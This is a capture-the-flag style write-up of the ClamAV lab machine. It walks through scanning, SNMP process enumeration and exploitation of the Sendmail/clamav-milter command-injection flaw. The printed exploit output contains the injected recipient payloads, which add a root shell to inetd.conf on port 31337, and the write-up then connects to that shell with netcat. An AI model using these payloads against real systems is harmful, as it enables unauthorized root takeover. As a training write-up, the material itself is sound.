TL;DR
This writeup is based on the ClamAV machine, involving a legacy Linux box. I began by performing an Nmap scan, which revealed multiple open ports including 22 (SSH), 25 (SMTP), 80 (HTTP), 139 (SMB), 199 (SNMP), 199 (SNMP), 445 and 60000 (SSH). While enumerating the SNMP service, we discovered the full process list which revealed a ClamAV Milter instance running on the target. We identified a critical Remote Command Execution vulnerability in this service. By exploiting an address extension bypass in Sendmail, we injected a command to modify the system’s inetd configuration, opening a backdoor root shell on port 31337.
Scanning Network
I began with an Nmap scan and identified several open ports running outdated services. Let’s review the Nmap results.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
sudo nmap -sS -sV -sC -p- -v 192.168.209.42 -oN scans/fullport.scan
Nmap scan report for 192.168.209.42
Host is up (0.064s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 3.8.1p1 Debian 8.sarge.6 (protocol 2.0)
| ssh-hostkey:
| 1024 30:3e:a4:13:5f:9a:32:c0:8e:46:eb:26:b3:5e:ee:6d (DSA)
|_ 1024 af:a2:49:3e:d8:f2:26:12:4a:a0:b5:ee:62:76:b0:18 (RSA)
25/tcp open smtp Sendmail 8.13.4/8.13.4/Debian-3sarge3
| smtp-commands: localhost.localdomain Hello [192.168.45.156], pleased to meet you, ENHANCEDSTATUSCODES, PIPELINING, EXPN, VERB, 8BITMIME, SIZE, DSN, ETRN, DELIVERBY, HELP
|_ 2.0.0 This is sendmail version 8.13.4 2.0.0 Topics: 2.0.0 HELO EHLO MAIL RCPT DATA 2.0.0 RSET NOOP QUIT HELP VRFY 2.0.0 EXPN VERB ETRN DSN AUTH 2.0.0 STARTTLS 2.0.0 For more info use "HELP <topic>". 2.0.0 To report bugs in the implementation send email to 2.0.0 [email protected]. 2.0.0 For local information send email to Postmaster at your site. 2.0.0 End of HELP info
80/tcp open http Apache httpd 1.3.33 ((Debian GNU/Linux))
|_http-server-header: Apache/1.3.33 (Debian GNU/Linux)
| http-methods:
| Supported Methods: GET HEAD OPTIONS TRACE
|_ Potentially risky methods: TRACE
|_http-title: Ph33r
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
199/tcp open smux Linux SNMP multiplexer
445/tcp open netbios-ssn Samba smbd 3.0.14a-Debian (workgroup: WORKGROUP)
60000/tcp open ssh OpenSSH 3.8.1p1 Debian 8.sarge.6 (protocol 2.0)
| ssh-hostkey:
| 1024 30:3e:a4:13:5f:9a:32:c0:8e:46:eb:26:b3:5e:ee:6d (DSA)
|_ 1024 af:a2:49:3e:d8:f2:26:12:4a:a0:b5:ee:62:76:b0:18 (RSA)
Service Info: Host: localhost.localdomain; OSs: Linux, Unix; CPE: cpe:/o:linux:linux_kernel
Host script results:
|_smb2-time: Protocol negotiation failed (SMB2)
| smb-os-discovery:
| OS: Unix (Samba 3.0.14a-Debian)
| NetBIOS computer name:
| Workgroup: WORKGROUP\x00
|_ System time: 2025-12-23T04:48:04-05:00
|_clock-skew: mean: 7h29m59s, deviation: 3h32m08s, median: 4h59m58s
| smb-security-mode:
| account_used: guest
| authentication_level: share (dangerous)
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| nbstat: NetBIOS name: 0XBABE, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| Names:
| 0XBABE<00> Flags: <unique><active>
| 0XBABE<03> Flags: <unique><active>
| 0XBABE<20> Flags: <unique><active>
| \x01\x02__MSBROWSE__\x02<01> Flags: <group><active>
| WORKGROUP<00> Flags: <group><active>
| WORKGROUP<1d> Flags: <unique><active>
|_ WORKGROUP<1e> Flags: <group><active>
I proceeded to enumerate the discovered services.
Enumeration
HTTP Enumeration
Let’s see the IP on the browser.
I observed a simple page displaying a long binary string. Decoding this string revealed a simple taunt:
ifyoudontpwnmeuran00b
I performed directory brute-forcing using dirsearch to find hidden paths.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
_|. _ _ _ _ _ _|_ v0.4.3
(_||| _) (/_(_|| (_| )
Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25 | Wordlist size: 220544
Output File: /home/kali/Documents/offsec/ClamAV/reports/http_192.168.209.42/__25-12-27_20-48-02.txt
Target: http://192.168.209.42/
[20:48:02] Starting:
[20:48:06] 403 - 272B - /doc
Task Completed#!/usr/bin/env
The scan identified a /doc directory returning a 403 Forbidden status. This means we cannot move further.
SNMP Enumeration
Given the open SNMP port, I utilized snmp-check to enumerate running processes.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
snmp-check 192.169.209.42
snmp-check v1.9 - SNMP enumerator
Copyright (c) 2005-2015 by Matteo Cantoni (www.nothink.org)
[+] Try to connect to 192.168.209.42:161 using SNMPv1 and community 'public'
[*] System information:
Host IP address : 192.168.209.42
Hostname : 0xbabe.local
Description : Linux 0xbabe.local 2.6.8-4-386 #1 Wed Feb 20 06:15:54 UTC 2008 i686
Contact : Root <root@localhost> (configure /etc/snmp/snmpd.local.conf)
Location : Unknown (configure /etc/snmp/snmpd.local.conf)
Uptime snmp : 00:02:38.36
Uptime system : 00:01:59.72
System date : 2025-12-22 14:04:20.0
...
[*] Processes:
Id Status Name Path Parameters
1 runnable init init [2]
2 runnable ksoftirqd/0 ksoftirqd/0
3 runnable events/0 events/0
3780 runnable clamd /usr/local/sbin/clamd
3782 runnable clamav-milter /usr/local/sbin/clamav-milter --black-hole-mode -l -o -q /var/run/clamav/clamav-milter.ctl
3791 runnable inetd /usr/sbin/inetd
3795 runnable nmbd /usr/sbin/nmbd -D
3797 runnable smbd /usr/sbin/smbd -D
3801 running snmpd /usr/sbin/snmpd -Lsd -Lf /dev/null -p /var/run/snmpd.pid
3807 runnable smbd /usr/sbin/smbd -D
3808 runnable sshd /usr/sbin/sshd
3941 runnable getty /sbin/getty 38400 tty6
The process list from the SNMP scan revealed that clamav-milter is running on the system.
Exploitation
I researched this service and found that clamav-milter (specifically when integrated with Sendmail) is vulnerable to Sendmail with clamav-milter < 0.91.2 - Remote Command Execution.
The exploit leverages a command injection flaw where unsanitized recipient addresses are passed to popen for notification. Attackers can bypass Sendmail’s strict input filters by appending the payload to a valid username using the + character (address extension). This forces the milter to process the full string, executing the injected shell command with the elevated privileges of the milter service. We utilized a Perl exploit which modifies the /etc/inetd.conf file to bind a root shell to port 31337.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
perl 4761.pl 192.168.209.42
Sendmail w/ clamav-milter Remote Root Exploit
Copyright (C) 2007 Eliteboy
Attacking 192.168.209.42...
220 localhost.localdomain ESMTP Sendmail 8.13.4/8.13.4/Debian-3sarge3; Sat, 22 Dec 2025 14:29:31 -0500; (No UCE/UBE) logging access from: [192.168.45.180](FAIL)-[192.168.45.180]
250-localhost.localdomain Hello [192.168.45.180], pleased to meet you
250-ENHANCEDSTATUSCODES
250-PIPELINING
250-EXPN
250-VERB
250-8BITMIME
250-SIZE
250-DSN
250-ETRN
250-DELIVERBY
250 HELP
250 2.1.0 <>... Sender ok
250 2.1.5 <nobody+"|echo '31337 stream tcp nowait root /bin/sh -i' >> /etc/inetd.conf">... Recipient ok
250 2.1.5 <nobody+"|/etc/init.d/inetd restart">... Recipient ok
354 Enter mail, end with "." on a line by itself
250 2.0.0 5BRJTVUJ004163 Message accepted for delivery
221 2.0.0 localhost.localdomain closing connection
Before attempting to connect, I verified that the port was successfully opened using Nmap.
1
2
3
4
5
6
7
8
9
10
sudo nmap -p31337 192.168.209.42
[sudo] password for kali:
Starting Nmap 7.95 ( https://nmap.org ) at 2025-12-22 16:00 IST
Nmap scan report for 192.168.209.42
Host is up (0.063s latency).
PORT STATE SERVICE
31337/tcp open Elite
Nmap done: 1 IP address (1 host up) scanned in 0.30 seconds
With the port confirmed open, I connected to the target using Netcat.
1
2
3
4
5
6
7
8
nc -nv 192.168.209.42 31337
(UNKNOWN) [192.168.209.42] 31337 (?) open
id
uid=0(root) gid=0(root) groups=0(root)
bash -i
bash: no job control in this shell
root@0xbabe:/# cat /root/proof.txt
This dropped me directly into a root shell, granting full control over the machine.
Thanks for reading this far. If you enjoyed the writeup, do support me here.

